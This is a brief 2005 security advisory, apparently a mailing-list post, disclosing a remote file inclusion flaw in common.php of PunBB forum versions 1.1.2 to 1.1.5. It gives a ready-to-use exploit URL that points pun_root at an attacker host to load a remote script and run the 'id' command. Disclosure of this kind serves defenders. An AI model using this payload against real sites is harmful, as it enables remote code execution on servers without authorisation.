PunBB versions between 1.1.2 and 1.1.5 suffer from a remote file inclusion vulnerability.
f713bad666ccd0bd7baae90f57cab948c2071b3654468d1386d041ef728e2c96
Remote File Inclusion in forum PunBB
Date:24/10/2005
Severity: High
version: 1.1.2 >> 1.1.5
The bug reside in common.php
Exploit :
http://www.host.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id
Discovery by RoDheDoR
L-G-H Team
http://www.lezr.com
_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now!
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/